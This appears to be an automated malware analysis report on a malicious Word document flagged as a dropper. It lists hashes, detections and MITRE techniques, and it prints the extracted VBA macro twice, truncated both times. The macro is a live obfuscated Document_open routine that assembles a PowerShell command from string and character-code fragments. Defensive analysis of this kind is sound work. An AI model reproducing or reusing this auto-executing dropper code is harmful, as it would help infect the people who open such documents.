Office (OLE) malware analysis — malicious · c07eddfbad257ea8

MALICIOUS

Office (OLE)

306.2 KB Created: 2018-07-12 20:13:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 12bcae481379ecad897d371d7bc7d000 SHA-1: 9d1a2e75ff19ad18f84f25799a62507c0522d4f5 SHA-256: c07eddfbad257ea82360ad6cc0a9ae6a36ae2592cf1919ba0f2ef4c5cd4a61bb

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6608874-0', suggesting it acts as a dropper for other malware. The VBA code's primary function appears to be executing a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6608906-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6608906-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39853 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	39853 bytes
SHA-256: `008bfd552b21340552ed4997b7525888f3fb5bf2b254c7d774b9eb1749ebf7c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AViwEYdl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next wdKXtP = (iwsCF - QPHTcn / 50424 / caZjO) lLtBwP = (lYpMAY - rXNAuG / 25439 / czKuz) WRjvc = (zsfGUt - QrGzi / 14482 / uSSKc) FwWCko = (KWJlhF - YJojTw / 7454 / ASfTE) pKTREnKIP = Application.Run("fpifwJK", "" + KKwVbHaaAi + AJvGiiWuJQ + JnnOSnQhNM + rDYOiY + qvhToqANRL + KauMU + rnQMX + ZCSjiq + hnXPzBMj + qTAajm + pfwZq + wjEmz + GWkUc + BIqVoT + wrEQihBYdEwM + iuZMpplqMPs) zFipXu = (wYElp - jjtsV / 2144 / aSNTjz) EzYSH = (OvoBE - qOTdt / 66149 / OOkYlQ) End Sub Attribute VB_Name = "UbmCbPQqJMjQTS" Function JnnOSnQhNM() On Error Resume Next CzoNV = 25578 * zYSVtJ * (FPEqF + BFwaj) hOZjjZ = 885 / 65495 - (wVjfbb * 1335) mSEwhtWzD = "" + qmUVwzjjLU + khAiMinS + "pOWe" + WluWMwBNi + aImzzzL + "RshE" + DjztVTFNOA + vaPibZkniwqsH + "lL" + OkMlbAIMmn + srnwdTQ + " " + Chr(34) + WPYXafnFtFmL + dBPFonNcvZZsw + " \" + Chr(34) + NYriprVnNBVUHt + ozAKwNObs + " $(" + TzwijtFjhvhFzI + ETSFjNK + " S" + vjDzKQmUzBoPSm + NAUHsBC + "Et" KHZPK = (11828 * OonJCh) / (iulBG * mlhsD * MqcCu - UmzINE) ABiwRz = (61914 * pNGzwJ) / (YZhLot * lltciu * WhjOK - kGjbE) BPvulK = (24152 * jjswCC) / (tFoQl * TjZll * pRqGHz - zWpzq) ozMkwnGkC = "" + mAoQIXVNimnDci + IAaXJtalwr + " 'oF" + DFwtDJjflVcNU + TTvhOoUq + "S' '" KntaCR = (32458 * cKYnu) / (SBDjn * NCFhG * DJqEj - IztWm) BDuLc = "" + LvrtnjZ + NkkCSjHiL + "' ) " + NHcYbIfzHwOw + LSLLuatIucTz + "\" + Chr(34) Nlobkw = (80651 * TTSiA) / (oSwmjS * RwWRt * FMzEcv - jVHnNC) wstPZ = (33385 * bihQu) / (wpRJrH * sUOpiK * SLKZjY - SDdCU) fhBXZl = "" + UXMAInjpiWvJ + iDjPYBQUHjW + " " + Chr(43) + " [" + loHWhzIzqdi + lVfClOm + "StR" ZVEAj = (38051 * PcibJ) / (BXzNJF * nawNTQ * oEzIuq - PlRjQ) aADawq = (39217 * DXEhI) / (zXrhSY * LfWjT * llhhtQ - MZunXZ) KkiQlzS = "" + aDMhZQO + zPmPVhtdHiXVqL + "INg" + ZZcDJtwhJFS + JVWGivAuwEMt + "]( " + sIfjrvGAq + pERFGQPZrz + "(36 " + PIQPhdV + PaGYiVbY + ", 70" + ikjtqjpq + UCViIQbbfYWVWM + ", 1" + LjcvnBMniPf + jsmhRqNFbQ + "12 ," + AsGmINXTMXIOs + phwslMBzj + " 1" FWMYkQ = (28021 * nIGAZ) / (HvMJj * oHXXY * Xcjwta - UIAHo) zrWKjj = (43972 * dRopwK) / (zzoAF * mVpPfz * tHoYV - ZzlMor) KbVidw = "" + PKDisTKBSohzNV + DiRwWcPTElDMmA + "14, " + MnFfLBFmiFWkos + ERkJqidmujZ + "61 ," + wORfkmaQB + cfPQGff + " 11" + cHUQwHiJTk + zVkqEEEGlLC + "0," + hLSMfOENhoqu + dHQwRGadJiZB + "101," FnRFlj = vLznV - NRhuw / 7484 + bwVOl / HDBomd / 76271 * ItXlIR + hwSJv * (MLbkdw - AHSCT * cNtXK * ivFXK) wLXzWqBGw = "" + HtCCFqturaDJ + cAbURwpBnYHz + "119 " + GnRboLwGFPzdP + TUBiwTEwqr + ", 4" + FGduFdGnDJcUTm + MWojHfUEGUOUCr + "5," + zPrAbUrzJuSK + KMzJjTDGoZlZ + "111" + PmlMisUEuVUs + aNNJMYKCWtIGj + ", 9" + ROCfGkWJGcz + RcprpPj + "8 ," + cNQaNQrD + cddGRMYD + " 10" + HhMMEku + RQMzFmoPf + "6, 1" + RCAnkco + fQLcWFuBDW + "01 " + nnKvPiXTcw + zmEhZccwYjl + ",99" + jcArnMJ + dPqrUzQCuiYi + ",11" + ANbbufzGBJpj + cpkilMJprh + "6,3" jWmDca = sAiLk - PnXNj / 3260 + wtZFzp / SaKWuT / 30764 * bTwhPc + WwdAT * (ZmbKf - hmwhG * hlSpHR * zQLDP) MnXbcz = XsoiL - ziMim / 84860 + iqqjqL / TFNjMK / 87209 * uPVFI + JsdGv * (RRDhQ - FEVwq * QOCSiF * BVsnz) KOQsYl = "" + iYzMZvIRCBjS + plzYkou + "2 " + NYkuhZdFYjoaf + QpIwAQwmhvjG + ",78" + YsoRhjnpAb + vIjAfJNNHv + " , " + MaPmCzBSojzqzI + wbohEcUqChQWt + "101 " + cMqFHUBnB + kPItBWLYRjG + ", 1" + jFZjViiYLPWdIC + unnHisFhJj + "16 ," + ULkWNzWB + SSvBYzlPs + "46" + EWtSsPrAsZ + TEAfAQLjoZbVV + ", 87" + TGvtoZpPorD + fBCsdcbwYTlz + ",10" + jfuXzfmXtwjAQ + LowvdBmWjsskj + "1 ," JtHlIk = TFpvHI - McMzI / 24430 + oEDmuJ / fFvFb / 13291 * mtfVER + qFiti * (WPfmY - HUpEzO * ioAtpf * Taihc) bqzqY = "" + zwVsPtoP + hszRzpjG + "98 " + hqMsNdwwjwJU + WqjGwhtYakInBB + ", 6" + BWaMcHmcimzsjb + FBvGFZHvp + "7 " + ckabuTmzn + UPEGbMkBpzk + ", " + AGWobOfXUqKs ... (truncated)

SHA-256: 008bfd552b21340552ed4997b7525888f3fb5bf2b254c7d774b9eb1749ebf7c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AViwEYdl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   wdKXtP = (iwsCF - QPHTcn / 50424 / caZjO)
   lLtBwP = (lYpMAY - rXNAuG / 25439 / czKuz)
   WRjvc = (zsfGUt - QrGzi / 14482 / uSSKc)
   FwWCko = (KWJlhF - YJojTw / 7454 / ASfTE)
pKTREnKIP = Application.Run("fpifwJK", "" + KKwVbHaaAi + AJvGiiWuJQ + JnnOSnQhNM + rDYOiY + qvhToqANRL + KauMU + rnQMX + ZCSjiq + hnXPzBMj + qTAajm + pfwZq + wjEmz + GWkUc + BIqVoT + wrEQihBYdEwM + iuZMpplqMPs)
   zFipXu = (wYElp - jjtsV / 2144 / aSNTjz)
   EzYSH = (OvoBE - qOTdt / 66149 / OOkYlQ)
End Sub


Attribute VB_Name = "UbmCbPQqJMjQTS"
Function JnnOSnQhNM()
On Error Resume Next
CzoNV = 25578 * zYSVtJ * (FPEqF + BFwaj)
   hOZjjZ = 885 / 65495 - (wVjfbb * 1335)
mSEwhtWzD = "" + qmUVwzjjLU + khAiMinS + "pOWe" + WluWMwBNi + aImzzzL + "RshE" + DjztVTFNOA + vaPibZkniwqsH + "lL" + OkMlbAIMmn + srnwdTQ + "   " + Chr(34) + WPYXafnFtFmL + dBPFonNcvZZsw + " \" + Chr(34) + NYriprVnNBVUHt + ozAKwNObs + " $(" + TzwijtFjhvhFzI + ETSFjNK + " S" + vjDzKQmUzBoPSm + NAUHsBC + "Et"
KHZPK = (11828 * OonJCh) / (iulBG * mlhsD * MqcCu - UmzINE)
   ABiwRz = (61914 * pNGzwJ) / (YZhLot * lltciu * WhjOK - kGjbE)
   BPvulK = (24152 * jjswCC) / (tFoQl * TjZll * pRqGHz - zWpzq)
ozMkwnGkC = "" + mAoQIXVNimnDci + IAaXJtalwr + " 'oF" + DFwtDJjflVcNU + TTvhOoUq + "S' '"
KntaCR = (32458 * cKYnu) / (SBDjn * NCFhG * DJqEj - IztWm)
BDuLc = "" + LvrtnjZ + NkkCSjHiL + "' ) " + NHcYbIfzHwOw + LSLLuatIucTz + "\" + Chr(34)
Nlobkw = (80651 * TTSiA) / (oSwmjS * RwWRt * FMzEcv - jVHnNC)
   wstPZ = (33385 * bihQu) / (wpRJrH * sUOpiK * SLKZjY - SDdCU)
fhBXZl = "" + UXMAInjpiWvJ + iDjPYBQUHjW + " " + Chr(43) + " [" + loHWhzIzqdi + lVfClOm + "StR"
ZVEAj = (38051 * PcibJ) / (BXzNJF * nawNTQ * oEzIuq - PlRjQ)
   aADawq = (39217 * DXEhI) / (zXrhSY * LfWjT * llhhtQ - MZunXZ)
KkiQlzS = "" + aDMhZQO + zPmPVhtdHiXVqL + "INg" + ZZcDJtwhJFS + JVWGivAuwEMt + "]( " + sIfjrvGAq + pERFGQPZrz + "(36 " + PIQPhdV + PaGYiVbY + ", 70" + ikjtqjpq + UCViIQbbfYWVWM + ", 1" + LjcvnBMniPf + jsmhRqNFbQ + "12 ," + AsGmINXTMXIOs + phwslMBzj + " 1"
FWMYkQ = (28021 * nIGAZ) / (HvMJj * oHXXY * Xcjwta - UIAHo)
   zrWKjj = (43972 * dRopwK) / (zzoAF * mVpPfz * tHoYV - ZzlMor)
KbVidw = "" + PKDisTKBSohzNV + DiRwWcPTElDMmA + "14, " + MnFfLBFmiFWkos + ERkJqidmujZ + "61 ," + wORfkmaQB + cfPQGff + " 11" + cHUQwHiJTk + zVkqEEEGlLC + "0," + hLSMfOENhoqu + dHQwRGadJiZB + "101,"
FnRFlj = vLznV - NRhuw / 7484 + bwVOl / HDBomd / 76271 * ItXlIR + hwSJv * (MLbkdw - AHSCT * cNtXK * ivFXK)
wLXzWqBGw = "" + HtCCFqturaDJ + cAbURwpBnYHz + "119 " + GnRboLwGFPzdP + TUBiwTEwqr + ", 4" + FGduFdGnDJcUTm + MWojHfUEGUOUCr + "5," + zPrAbUrzJuSK + KMzJjTDGoZlZ + "111" + PmlMisUEuVUs + aNNJMYKCWtIGj + ", 9" + ROCfGkWJGcz + RcprpPj + "8 ," + cNQaNQrD + cddGRMYD + " 10" + HhMMEku + RQMzFmoPf + "6, 1" + RCAnkco + fQLcWFuBDW + "01 " + nnKvPiXTcw + zmEhZccwYjl + ",99" + jcArnMJ + dPqrUzQCuiYi + ",11" + ANbbufzGBJpj + cpkilMJprh + "6,3"
jWmDca = sAiLk - PnXNj / 3260 + wtZFzp / SaKWuT / 30764 * bTwhPc + WwdAT * (ZmbKf - hmwhG * hlSpHR * zQLDP)
   MnXbcz = XsoiL - ziMim / 84860 + iqqjqL / TFNjMK / 87209 * uPVFI + JsdGv * (RRDhQ - FEVwq * QOCSiF * BVsnz)
KOQsYl = "" + iYzMZvIRCBjS + plzYkou + "2 " + NYkuhZdFYjoaf + QpIwAQwmhvjG + ",78" + YsoRhjnpAb + vIjAfJNNHv + " , " + MaPmCzBSojzqzI + wbohEcUqChQWt + "101 " + cMqFHUBnB + kPItBWLYRjG + ", 1" + jFZjViiYLPWdIC + unnHisFhJj + "16 ," + ULkWNzWB + SSvBYzlPs + "46" + EWtSsPrAsZ + TEAfAQLjoZbVV + ", 87" + TGvtoZpPorD + fBCsdcbwYTlz + ",10" + jfuXzfmXtwjAQ + LowvdBmWjsskj + "1 ,"
JtHlIk = TFpvHI - McMzI / 24430 + oEDmuJ / fFvFb / 13291 * mtfVER + qFiti * (WPfmY - HUpEzO * ioAtpf * Taihc)
bqzqY = "" + zwVsPtoP + hszRzpjG + "98 " + hqMsNdwwjwJU + WqjGwhtYakInBB + ", 6" + BWaMcHmcimzsjb + FBvGFZHvp + "7 " + ckabuTmzn + UPEGbMkBpzk + ", " + AGWobOfXUqKs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.